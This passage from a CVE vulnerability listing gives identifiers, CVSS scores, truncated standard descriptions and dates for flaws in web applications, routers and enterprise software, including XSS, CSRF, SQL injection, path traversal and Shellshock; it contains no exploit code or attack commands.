An issue was discovered in PHPMailer before 5.2.22. PHPMailer's msgHTML method applies transformations to an HTML document to make it usable as an email message body. One of the transformations is to convert relative image URLs into attachments using
18-01-2017 - 13:20 16-01-2017 - 01:59
CVE-2016-4807 3.5
Web2py versions 2.14.5 and below were affected by a Reflected XSS vulnerability, which allows an attacker to perform an XSS attack on a logged-in user (admin).
11-01-2017 - 15:09 11-01-2017 - 11:59
CVE-2016-0891 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in administrative pages in EMC ViPR SRM before 3.7 allow remote attackers to hijack the authentication of administrators.
10-01-2017 - 23:10 20-04-2016 - 13:59
CVE-2015-4594 7.5
eClinicalWorks Population Health (CCMR) suffers from a session fixation vulnerability. When authenticating a user, the application does not assign a new session ID, making it possible to use an existing session ID.
10-01-2017 - 19:21 10-01-2017 - 10:59
CVE-2015-4591 4.3
eClinicalWorks Population Health (CCMR) suffers from a cross site scripting vulnerability in login.jsp which allows remote unauthenticated users to inject arbitrary javascript via the strMessage parameter.
10-01-2017 - 11:33 10-01-2017 - 10:59
CVE-2015-4593 6.8
eClinicalWorks Population Health (CCMR) suffers from a cross-site request forgery (CSRF) vulnerability in portalUserService.jsp which allows remote attackers to hijack the authentication of content administrators for requests that could lead to the c
10-01-2017 - 11:33 10-01-2017 - 10:59
CVE-2015-4592 7.5
eClinicalWorks Population Health (CCMR) suffers from an SQL injection vulnerability in portalUserService.jsp which allows remote authenticated users to inject arbitrary malicious database commands as part of user input.
10-01-2017 - 11:33 10-01-2017 - 10:59
CVE-2014-8727 6.2
Multiple directory traversal vulnerabilities in F5 BIG-IP before 10.2.2 allow local users with the "Resource Administrator" or "Administrator" role to enumerate and delete arbitrary files via a .. (dot dot) in the name parameter to (1) tmui/Control/j
06-01-2017 - 22:00 17-11-2014 - 11:59
CVE-2014-6271 10.0
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceComman
06-01-2017 - 22:00 24-09-2014 - 14:48
CVE-2014-3857 6.5
Multiple SQL injection vulnerabilities in Kerio Control Statistics in Kerio Control (formerly WinRoute Firewall) before 8.3.2 allow remote authenticated users to execute arbitrary SQL commands via the (1) x_16 or (2) x_17 parameter to print.php.
06-01-2017 - 22:00 03-07-2014 - 10:55
CVE-2014-2513 8.2
EMC Documentum Content Server before 6.7 SP1 P28, 6.7 SP2 before P15, 7.0 before P15, and 7.1 before P06 does not properly check authorization after creation of an object, which allows remote authenticated users to execute arbitrary code with super-u
06-01-2017 - 21:59 08-07-2014 - 07:06
CVE-2014-2399 4.3
Unspecified vulnerability in the Oracle Endeca Server component in Oracle Fusion Middleware 2.2.2 allows remote attackers to affect integrity via unknown vectors related to Oracle Endeca Information Discovery (Formerly Latitude), a different vulnerab
06-01-2017 - 21:59 15-04-2014 - 21:55
CVE-2013-5528 4.0
Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug I
04-01-2017 - 09:52 10-10-2013 - 23:54
CVE-2016-10074 7.5
The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mai
03-01-2017 - 13:56 30-12-2016 - 14:59
CVE-2016-10034 7.5
The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently e
03-01-2017 - 13:07 30-12-2016 - 14:59
CVE-2014-8008 6.8
Absolute path traversal vulnerability in the Real-Time Monitoring Tool (RTMT) API in Cisco Unified Communications Manager (CUCM) allows remote authenticated users to read arbitrary files via a full pathname in an API command, aka Bug ID CSCur49414.
02-01-2017 - 21:59 22-01-2015 - 09:01
CVE-2014-6593 4.0
Unspecified vulnerability in Oracle Java SE 5.0u75, 6u85, 7u72, and 8u25; Java SE Embedded 7u71 and 8u6; and JRockit 27.8.4 and 28.3.4 allows remote attackers to affect confidentiality and integrity via vectors related to JSSE.
02-01-2017 - 21:59 21-01-2015 - 10:28
CVE-2015-4127 4.3
Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin
30-12-2016 - 21:59 28-05-2015 - 10:59
CVE-2015-4010 6.8
Cross-site request forgery (CSRF) vulnerability in the Encrypted Contact Form plugin before 1.1 for WordPress allows remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the
30-12-2016 - 21:59 09-06-2015 - 10:59
CVE-2015-2125 4.0
Unspecified vulnerability in HP WebInspect 7.x through 10.4 before 10.4 update 1 allows remote authenticated users to bypass intended access restrictions via unknown vectors.
30-12-2016 - 21:59 07-06-2015 - 14:59
CVE-2015-1833 6.4
XML external entity (XXE) vulnerability in Apache Jackrabbit before 2.0.6, 2.2.x before 2.2.14, 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.1, and 2.10.x before 2.10.1 allows remote attackers to read arbitrary files and send requests to
30-12-2016 - 21:59 29-05-2015 - 11:59
CVE-2015-1389 4.3
Cross-site scripting (XSS) vulnerability in Aruba Networks ClearPass Policy Manager (CPPM) before 6.4.5 allows remote attackers to inject arbitrary web script or HTML via the username parameter to tips/tipsLoginSubmit.action.
30-12-2016 - 21:59 28-05-2015 - 10:59
CVE-2013-7349 7.5
Multiple SQL injection vulnerabilities in Gnew 2013.1 allow remote attackers to execute arbitrary SQL commands via the (1) news_id parameter to news/send.php, (2) thread_id parameter to posts/edit.php, or (3) user_email parameter to users/password.ph
30-12-2016 - 21:59 31-03-2014 - 23:25
CVE-2013-7316 4.3
Cross-site scripting (XSS) vulnerability in GitLab 6.0 and other versions before 6.5.0 allows remote attackers to inject arbitrary web script or HTML via a crafted HTML file, as demonstrated by README.html.
30-12-2016 - 21:59 24-01-2014 - 10:08
CVE-2013-7274 3.5
Cross-site scripting (XSS) vulnerability in Wallpaper Script 3.5.0082 allows remote authenticated users to inject arbitrary web script or HTML via the title field in a wallpaper file upload.
30-12-2016 - 21:59 08-01-2014 - 10:29
CVE-2013-5640 7.5
Multiple SQL injection vulnerabilities in Gnew 2013.1 allow remote attackers to execute arbitrary SQL commands via the (1) answer_id or (2) question_id parameter to polls/vote.php, (3) story_id parameter to comments/add.php or (4) comments/edit.php,
30-12-2016 - 21:59 31-03-2014 - 23:24
CVE-2013-5573 4.3
Cross-site scripting (XSS) vulnerability in the default markup formatter in Jenkins 1.523 allows remote attackers to inject arbitrary web script or HTML via the Description field in the user configuration.
30-12-2016 - 21:59 31-12-2013 - 11:04
CVE-2015-1793 6.4
The X509_verify_cert function in crypto/x509/x509_vfy.c in OpenSSL 1.0.1n, 1.0.1o, 1.0.2b, and 1.0.2c does not properly process X.509 Basic Constraints cA values during identification of alternative certificate chains, which allows remote attackers t
27-12-2016 - 21:59 09-07-2015 - 15:17
CVE-2015-5161 6.8
The Zend_Xml_Security::scan in ZendXml before 1.0.1 and Zend Framework before 1.12.14, 2.x before 2.4.6, and 2.5.x before 2.5.2, when running under PHP-FPM in a threaded environment, allows remote attackers to bypass security checks and conduct XML e
23-12-2016 - 21:59 25-08-2015 - 13:59
CVE-2014-2962 7.8
Absolute path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
23-12-2016 - 21:59 19-06-2014 - 06:50
CVE-2016-7065 6.5
The JMX servlet in Red Hat JBoss Enterprise Application Platform (EAP) 4 and 5 allows remote authenticated users to cause a denial of service and possibly execute arbitrary code via a crafted serialized Java object.
22-12-2016 - 21:59 13-10-2016 - 10:59
CVE-2016-9838 5.0
An issue was discovered in components/com_users/models/registration.php in Joomla! before 3.6.5. Incorrect filtering of registration form data stored to the session on a validation error enables a user to gain access to a registered user's account an
22-12-2016 - 11:27 16-12-2016 - 04:59
CVE-2016-0492 6.4
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Load Testing fo
22-12-2016 - 09:39 20-01-2016 - 22:00
CVE-2016-0491 6.4
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect integrity and availability via unknown vectors related to Load Testing for W
22-12-2016 - 09:38 20-01-2016 - 22:00
CVE-2016-1000123 7.5
Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
22-12-2016 - 09:21 06-10-2016 - 10:59
CVE-2015-7235 7.5
Multiple SQL injection vulnerabilities in dex_reservations.php in the CP Reservation Calendar plugin before 1.1.7 for WordPress allow remote attackers to execute arbitrary SQL commands via the (1) id parameter in a dex_reservations_calendar_load2 act
21-12-2016 - 22:00 17-09-2015 - 12:59
CVE-2015-6973 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Ignite Realtime Openfire 3.10.2 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via a crafted request to user-password.jsp, (2
21-12-2016 - 22:00 16-09-2015 - 15:59
CVE-2015-6962 7.5
SQL injection vulnerability in the web application in Farol allows remote attackers to execute arbitrary SQL commands via the email parameter to tkmonitor/estrutura/login/Login.actions.php.
21-12-2016 - 22:00 17-09-2015 - 11:59
CVE-2015-6827 6.8
Cross-site request forgery (CSRF) vulnerability in Auto-Exchanger 5.1.0 allows remote attackers to hijack the authentication of users for requests that change a password via a request to signup.php.
21-12-2016 - 22:00 11-09-2015 - 11:59
CVE-2015-6805 3.5
Cross-site scripting (XSS) vulnerability in the MDC Private Message plugin 1.0.0 for WordPress allows remote authenticated users to inject arbitrary web script or HTML via the message field in a private message.
21-12-2016 - 22:00 02-09-2015 - 10:59
CVE-2015-6655 6.8
Cross-site request forgery (CSRF) vulnerability in Pligg CMS 2.0.2 allows remote attackers to hijack the authentication of administrators for requests that add an administrator via a request to admin/admin_users.php.
21-12-2016 - 22:00 31-08-2015 - 15:59
CVE-2015-6545 6.8
Cross-site request forgery (CSRF) vulnerability in ajax.php in Cerb before 7.0.4 allows remote attackers to hijack the authentication of administrators for requests that add an administrator account via a saveWorkerPeek action.
21-12-2016 - 22:00 03-09-2015 - 13:59
CVE-2015-2321 4.3
Cross-site scripting (XSS) vulnerability in the Job Manager plugin 0.7.22 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the email field.
21-12-2016 - 21:59 13-08-2015 - 10:59
CVE-2012-6644 4.3
Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2.6 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to channels.php, (2) collections.php, (3) groups.php, or (4) videos.php; (5) query parameter
21-12-2016 - 21:59 08-04-2014 - 10:22
CVE-2016-5740 4.3
An issue was discovered in Open-Xchange OX App Suite before 7.8.2-rev5. JavaScript code can be used as part of ical attachments within scheduling E-Mails. This content, for example an appointment's location, will be presented to the user at the E-Mai
16-12-2016 - 14:24 15-12-2016 - 01:59
CVE-2016-6851 4.3
An issue was discovered in Open-Xchange OX Guard before 2.4.2-rev5. Script code can be provided as parameter to the OX Guard guest reader web application. This allows cross-site scripting attacks against arbitrary users since no prior authentication
16-12-2016 - 12:09 15-12-2016 - 01:59
CVE-2016-6853 4.3
An issue was discovered in Open-Xchange OX Guard before 2.4.2-rev5. Script code and references to external websites can be injected to the names of PGP public keys. When requesting that key later on using a specific URL, such script code might get ex
16-12-2016 - 12:09 15-12-2016 - 01:59
CVE-2016-6854 4.3
An issue was discovered in Open-Xchange OX Guard before 2.4.2-rev5. Script code which got injected to a mail with inline PGP signature gets executed when verifying the signature. Malicious script code can be executed within a user's context. This can
16-12-2016 - 12:09 15-12-2016 - 01:59
CVE-2015-6522 7.5
SQL injection vulnerability in the WP Symposium plugin before 15.8 for WordPress allows remote attackers to execute arbitrary SQL commands via the size parameter to get_album_item.php.
09-12-2016 - 09:29 19-08-2015 - 11:59
CVE-2015-7387 7.5
ZOHO ManageEngine EventLog Analyzer 10.6 build 10060 and earlier allows remote attackers to bypass intended restrictions and execute arbitrary SQL commands via an allowed query followed by a disallowed one in the query parameter to event/runQuery.do,
07-12-2016 - 22:13 28-09-2015 - 11:59
CVE-2015-5531 5.0
Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
07-12-2016 - 22:10 17-08-2015 - 11:59
CVE-2015-5075 6.8
Cross-site request forgery (CSRF) vulnerability in X2Engine X2CRM before 5.2 allows remote attackers to hijack the authentication of administrators for requests that create an administrative account via a crafted request to index.php/users/create.
07-12-2016 - 22:09 29-09-2015 - 15:59
CVE-2015-5074 7.5
Incomplete blacklist vulnerability in the FileUploadsFilter class in protected/components/filters/FileUploadsFilter.php in X2Engine X2CRM before 5.0.9 allows remote authenticated users to execute arbitrary PHP code by uploading a file with a .pht ext
07-12-2016 - 22:09 29-09-2015 - 15:59
CVE-2008-6740 6.8
PHP remote file inclusion vulnerability in html/admin/modules/plugin_admin.php in HoMaP-CMS 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the _settings[pluginpath] parameter.
07-12-2016 - 22:01 21-04-2009 - 14:30
CVE-2008-5191 7.5
Multiple SQL injection vulnerabilities in SePortal 2.4 allow remote attackers to execute arbitrary SQL commands via the (1) poll_id parameter to poll.php and the (2) sp_id parameter to staticpages.php.
07-12-2016 - 22:01 21-11-2008 - 12:30
CVE-2015-8562 7.5
Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.
07-12-2016 - 13:28 16-12-2015 - 16:59
CVE-2015-8358 9.0
Directory traversal vulnerability in the bitrix.mpbuilder module before 1.0.12 for Bitrix allows remote administrators to include and execute arbitrary local files via a .. (dot dot) in the element name of the "work" array parameter to admin/bitrix.m
07-12-2016 - 13:27 16-12-2015 - 16:59
CVE-2015-8357 6.5
Directory traversal vulnerability in the bitrix.xscan module before 1.0.4 for Bitrix allows remote authenticated users to rename arbitrary files, and consequently obtain sensitive information or cause a denial of service, via a .. (dot dot) in the fi
07-12-2016 - 13:27 16-12-2015 - 16:59
CVE-2015-7986 7.5
The index server (hdbindexserver) in SAP HANA 1.00.095 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via an HTTP request, aka SAP Security Note 2197428.
07-12-2016 - 13:25 27-10-2015 - 12:59
CVE-2015-7984 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Horde before 5.2.8, Horde Groupware before 5.2.11, and Horde Groupware Webmail Edition before 5.2.11 allow remote attackers to hijack the authentication of administrators for requests that
07-12-2016 - 13:25 19-11-2015 - 15:59
CVE-2015-6018 10.0
The diagnostic-ping implementation on ZyXEL PMG5318-B20A devices with firmware before 1.00(AANC.2)C0 allows remote attackers to execute arbitrary commands via the PingIPAddr parameter.
07-12-2016 - 13:17 31-12-2015 - 00:59
CVE-2015-5999 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in the D-Link DIR-816L Wireless Router with firmware before 2.06.B09_BETA allow remote attackers to hijack the authentication of administrators for requests that (1) change the admin password
07-12-2016 - 13:17 18-11-2015 - 11:59
CVE-2015-5603 6.5
The HipChat for JIRA plugin before 6.30.0 for Atlassian JIRA allows remote authenticated users to execute arbitrary Java code via unspecified vectors, related to "Velocity Template Injection Vulnerability."
07-12-2016 - 13:17 21-09-2015 - 15:59
CVE-2015-5534 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Oxwall before 1.8 allow remote attackers to hijack the authentication of administrators for requests that (1) put the website under maintenance via the maintenance_enable parameter or (2)
07-12-2016 - 13:16 02-11-2015 - 14:59
CVE-2015-5354 5.8
Open redirect vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
07-12-2016 - 13:16 01-07-2015 - 12:59
CVE-2015-5353 7.5
Directory traversal vulnerability in Novius OS 5.0.1 (Elche) allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the tab parameter to admin/.
07-12-2016 - 13:16 01-07-2015 - 12:59
CVE-2015-5149 5.5
Directory traversal vulnerability in Zoho ManageEngine SupportCenter Plus 7.90 allows remote authenticated users to write to arbitrary files via a .. (dot dot) in the component parameter in the Request component to workorder/Attachment.jsp.
07-12-2016 - 13:15 30-06-2015 - 10:59
CVE-2015-5065 5.0
Absolute path traversal vulnerability in proxy.php in the google currency lookup in the Paypal Currency Converter Basic For WooCommerce plugin before 1.4 for WordPress allows remote attackers to read arbitrary files via a full pathname in the requrl
07-12-2016 - 13:15 24-06-2015 - 10:59
CVE-2015-4677 6.8
Cross-site request forgery (CSRF) vulnerability in FiverrScript (aka Fiverr Script) 7.2 allows remote attackers to hijack the authentication of administrators for requests that create a new admin via a request to administrator/admins_create.php.
07-12-2016 - 13:13 19-06-2015 - 10:59
CVE-2015-4659 6.8
Cross-site request forgery (CSRF) vulnerability in ClickHeat 1.14 and earlier allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a config action to index.php.
07-12-2016 - 13:13 18-06-2015 - 14:59
CVE-2015-4460 6.8
Cross-site request forgery (CSRF) vulnerability in SecuritySetting/UserSecurity/UserManagement.aspx in B.A.S C2Box before 4.0.0 (r19171) allows remote attackers to hijack the authentication of administrators for requests that add administrator accoun
07-12-2016 - 13:12 16-07-2015 - 16:59
CVE-2015-4414 5.0
Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
07-12-2016 - 13:12 17-06-2015 - 14:59
CVE-2015-4153 5.0
Directory traversal vulnerability in the zM Ajax Login & Register plugin before 1.1.0 for WordPress allows remote attackers to include and execute arbitrary php files via a relative path in the template parameter in a load_template action to wp-admin
07-12-2016 - 13:11 10-06-2015 - 14:59
CVE-2010-1622 6.0
SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .ja
06-12-2016 - 21:59 21-06-2010 - 12:30
CVE-2014-3120 6.8
The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended se
06-12-2016 - 13:13 28-07-2014 - 15:55
CVE-2016-1525 7.8
Directory traversal vulnerability in data/config/image.do in NETGEAR Management System NMS300 1.5.0.11 and earlier allows remote authenticated users to read arbitrary files via a .. (dot dot) in the realName parameter.
05-12-2016 - 22:07 12-02-2016 - 21:59
CVE-2016-1524 8.3
Multiple unrestricted file upload vulnerabilities in NETGEAR Management System NMS300 1.5.0.11 and earlier allow remote attackers to execute arbitrary Java code by using (1) fileUpload.do or (2) lib-1.0/external/flash/fileUpload.do to upload a JSP fi
05-12-2016 - 22:07 12-02-2016 - 21:59
CVE-2016-0956 7.8
The Servlets Post component 2.3.6 in Apache Sling, as used in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0, allows remote attackers to obtain sensitive information via unspecified vectors.
05-12-2016 - 22:06 10-02-2016 - 15:59
CVE-2016-0862 4.0
General Electric (GE) Industrial Solutions UPS SNMP/Web Adapter devices with firmware before 4.8 allow remote authenticated users to obtain sensitive cleartext account information via unspecified vectors.
05-12-2016 - 22:05 05-02-2016 - 06:59
CVE-2016-0861 9.0
General Electric (GE) Industrial Solutions UPS SNMP/Web Adapter devices with firmware before 4.8 allow remote authenticated users to execute arbitrary commands via unspecified vectors.
05-12-2016 - 22:05 05-02-2016 - 06:59
CVE-2015-8770 6.0
Directory traversal vulnerability in the set_skin function in program/include/rcmail_output_html.php in Roundcube before 1.0.8 and 1.1.x before 1.1.4 allows remote authenticated users with certain permissions to read arbitrary files or possibly execu
05-12-2016 - 22:04 29-01-2016 - 14:59
CVE-2015-4137 7.5
SQL injection vulnerability in related.php in Milw0rm Clone Script 1.0 allows remote attackers to execute arbitrary SQL commands via the program parameter.
05-12-2016 - 22:02 29-05-2015 - 10:59
CVE-2015-4119 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in ISPConfig before 3.0.5.4p7 allow remote attackers to hijack the authentication of (1) administrators for requests that create an administrator account via a request to admin/users_edit.php
05-12-2016 - 22:02 15-06-2015 - 11:59
CVE-2015-4118 6.5
SQL injection vulnerability in monitor/show_sys_state.php in ISPConfig before 3.0.5.4p7 allows remote authenticated users with monitor permissions to execute arbitrary SQL commands via the server parameter. NOTE: this can be leveraged by remote atta
05-12-2016 - 22:02 15-06-2015 - 11:59
CVE-2015-4084 4.3
Cross-site scripting (XSS) vulnerability in the Free Counter plugin 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the value_ parameter in a check_stat action to wp-admin/admin-ajax.php.
05-12-2016 - 22:02 28-05-2015 - 10:59
CVE-2015-3624 5.8
Cross-site request forgery (CSRF) vulnerability in Test/WorkArea/DmsMenu/menuActions/MenuActions.aspx in Ektron Content Management System (CMS) before 9.10 SP1 (Build 9.1.0.184.1.120) allows remote attackers to hijack the authentication of content ad
05-12-2016 - 22:01 09-06-2015 - 10:59
CVE-2015-3443 3.5
Cross-site scripting (XSS) vulnerability in the basic dashboard in Thycotic Secret Server 8.6.x, 8.7.x, and 8.8.x before 8.8.000005 allows remote authenticated users to inject arbitrary web script or HTML via a password entry, which is not properly h
05-12-2016 - 22:01 02-07-2015 - 10:59
CVE-2015-3440 4.3
Cross-site scripting (XSS) vulnerability in wp-includes/wp-db.php in WordPress before 4.2.1 allows remote attackers to inject arbitrary web script or HTML via a long comment that is improperly stored because of limitations on the MySQL TEXT data type
05-12-2016 - 22:01 03-08-2015 - 10:59
CVE-2006-5613 7.5
PHP remote file inclusion vulnerability in Core/core.inc.php in MP3 Streaming DownSampler (mp3SDS) 3.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via the fullpath parameter.
05-12-2016 - 21:59 30-10-2006 - 20:07
CVE-2006-3928 7.5
PHP remote file inclusion vulnerability in index.php in WMNews 0.2a and earlier allows remote attackers to execute arbitrary PHP code via a URL in the base_datapath parameter.
05-12-2016 - 21:59 31-07-2006 - 17:04
CVE-2016-2279 4.3
Cross-site scripting (XSS) vulnerability in the web server in Rockwell Automation Allen-Bradley CompactLogix 1769-L* before 28.011+ allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
02-12-2016 - 22:24 02-03-2016 - 06:59
CVE-2016-2203 2.1
The management console on Symantec Messaging Gateway (SMG) Appliance devices before 10.6.1 allows local users to discover an encrypted AD password by leveraging certain read privileges.
02-12-2016 - 22:24 22-04-2016 - 14:59
CVE-2016-1910 5.0
The User Management Engine (UME) in SAP NetWeaver 7.4 allows attackers to decrypt unspecified data via unknown vectors, aka SAP Security Note 2191290.
02-12-2016 - 22:23 15-01-2016 - 15:59
CVE-2016-1596 3.5
Multiple cross-site scripting (XSS) vulnerabilities in Micro Focus Novell Service Desk before 7.2 allow remote authenticated users to inject arbitrary web script or HTML via a certain (1) user name, (2) tf_aClientFirstName, (3) tf_aClientLastName, (4
02-12-2016 - 22:21 22-04-2016 - 06:59
CVE-2016-1595 4.0
LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile in Micro Focus Novell Service Desk before 7.2 allows remote authenticated users to conduct Hibernate Query Language (HQL) injection attacks and obtain sensitive information via the entit
02-12-2016 - 22:21 22-04-2016 - 06:59
CVE-2016-1594 4.0
Micro Focus Novell Service Desk before 7.2 allows remote authenticated users to read arbitrary attachments via a request to a LiveTime.woa URL, as demonstrated by obtaining sensitive information via a (1) downloadLogFiles or (2) downloadFile action.
02-12-2016 - 22:21 22-04-2016 - 06:59
CVE-2016-1593 6.5
Directory traversal vulnerability in the import users feature in Micro Focus Novell Service Desk before 7.2 allows remote authenticated administrators to upload and execute arbitrary JSP files via a .. (dot dot) in a filename within a multipart/form-
02-12-2016 - 22:21 22-04-2016 - 06:59
CVE-2015-3221 4.0
OpenStack Neutron before 2014.2.4 (juno) and 2015.1.x before 2015.1.1 (kilo), when using the IPTables firewall driver, allows remote authenticated users to cause a denial of service (L2 agent crash) by adding an address pair that is rejected by the i
02-12-2016 - 22:08 26-08-2015 - 15:59
CVE-2015-3141 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Synametrics Technologies Xeams 4.5 Build 5755 and earlier allow remote attackers to hijack the authentication of administrators for requests that create an (1) SMTP domain or a (2) user vi
02-12-2016 - 22:08 20-05-2015 - 15:59
CVE-2015-2845 10.0
The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1421902800 allows remote attackers to execute arbitrary commands via the $type portion of the PATH_INFO.
02-12-2016 - 22:06 12-05-2015 - 15:59
CVE-2015-2844 10.0
The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1420434000 allows remote attackers to execute arbitrary commands via the $action portion of the PATH_INFO.
02-12-2016 - 22:06 12-05-2015 - 15:59
CVE-2015-2843 7.5
Multiple SQL injection vulnerabilities in GoAutoDial GoAdmin CE before 3.3-1421902800 allow remote attackers to execute arbitrary SQL commands via the (1) user_name or (2) user_pass parameter in go_login.php or the PATH_INFO to (3) go_login/validate_
02-12-2016 - 22:06 12-05-2015 - 15:59
CVE-2015-2842 10.0
Unrestricted file upload vulnerability in go_audiostore.php in the audiostore (Voice Files) upload functionality in GoAutoDial GoAdmin CE 3.x before 3.3-1421902800 allows remote attackers to execute arbitrary code by uploading a file with an executab
02-12-2016 - 22:06 12-05-2015 - 15:59
CVE-2015-2841 5.0
Citrix NetScaler AppFirewall, as used in NetScaler 10.5, allows remote attackers to bypass intended firewall restrictions via a crafted Content-Type header, as demonstrated by the application/octet-stream and text/xml Content-Types.
02-12-2016 - 22:06 03-04-2015 - 10:59
CVE-2015-2838 6.8
Cross-site request forgery (CSRF) vulnerability in Nitro API in Citrix NetScaler before 10.5 build 52.3nc allows remote attackers to hijack the authentication of administrators for requests that execute arbitrary commands as nsroot via shell metachar
02-12-2016 - 22:06 03-04-2015 - 10:59
CVE-2015-2825 7.5
Unrestricted file upload vulnerability in sam-ajax-admin.php in the Simple Ads Manager plugin before 2.5.96 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a dire
02-12-2016 - 22:06 21-04-2015 - 11:59
CVE-2015-2824 7.5
Multiple SQL injection vulnerabilities in the Simple Ads Manager plugin before 2.7.97 for WordPress allow remote attackers to execute arbitrary SQL commands via a (1) hits[][] parameter in a sam_hits action to sam-ajax.php; the (2) cstr parameter in
02-12-2016 - 22:06 06-04-2015 - 11:59
CVE-2015-2805 6.8
Cross-site request forgery (CSRF) vulnerability in sec/content/sec_asa_users_local_db_add.html in the management web interface in Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855, 6900, 10K, and 6860 with firmware 6.4.5.R02, 6.4.6.R01,
02-12-2016 - 22:06 16-06-2015 - 12:59
CVE-2015-2803 6.0
SQL injection vulnerability in mod1/index.php in the Akronymmanager (sb_akronymmanager) extension before 7.0.0 for TYPO3 allows remote authenticated users with permission to maintain acronyms to execute arbitrary SQL commands via the id parameter.
02-12-2016 - 22:06 17-06-2015 - 14:59
CVE-2015-2746 6.5
The network diagnostics tool (CommandLineServlet) in the Appliance Manager command line utility (CLU) in Websense TRITON 7.8.3 and V-Series appliances before 7.8.4 Hotfix 02 allows remote authenticated users to execute arbitrary commands via shell me
02-12-2016 - 22:05 26-03-2015 - 10:59
CVE-2015-2701 6.8
Cross-site request forgery (CSRF) vulnerability in CS-Cart 4.2.4 allows remote attackers to hijack the authentication of users for requests that change a user password via a request to profiles-update/.
02-12-2016 - 22:05 25-03-2015 - 10:59
CVE-2015-2682 5.0
Citrix Command Center before 5.1 Build 35.4 and 5.2 before Build 42.7 allows remote attackers to obtain credentials via a direct request to conf/securitydbData.xml.
02-12-2016 - 22:05 26-03-2015 - 10:59
CVE-2015-2680 6.8
Cross-site request forgery (CSRF) vulnerability in MetalGenix GeniXCMS before 0.0.2 allows remote attackers to hijack the authentication of administrators for requests that add an administrator account via a request in the users page to gxadmin/index
02-12-2016 - 22:05 23-03-2015 - 12:59
CVE-2015-2679 7.5
Multiple SQL injection vulnerabilities in MetalGenix GeniXCMS before 0.0.2 allow remote attackers to execute arbitrary SQL commands via the (1) page parameter to index.php or (2) username parameter to gxadmin/login.php.
02-12-2016 - 22:05 23-03-2015 - 12:59
CVE-2015-2678 4.3
Multiple cross-site scripting (XSS) vulnerabilities in MetalGenix GeniXCMS before 0.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter in the categories page to gxadmin/index.php or (2) page parameter to index
02-12-2016 - 22:05 23-03-2015 - 12:59
CVE-2015-2562 7.5
Multiple SQL injection vulnerabilities in the Web-Dorado ECommerce WD (com_ecommercewd) component 1.2.5 for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) search_category_id, (2) sort_order, or (3) filter_manufacturer_id
02-12-2016 - 22:05 20-03-2015 - 10:59
CVE-2015-2295 6.8
Cross-site request forgery (CSRF) vulnerability in system_firmware_restorefullbackup.php in the WebGUI in pfSense before 2.2.1 allows remote attackers to hijack the authentication of administrators for requests that delete arbitrary files via the del
02-12-2016 - 22:04 10-04-2015 - 11:00
CVE-2015-2292 6.5
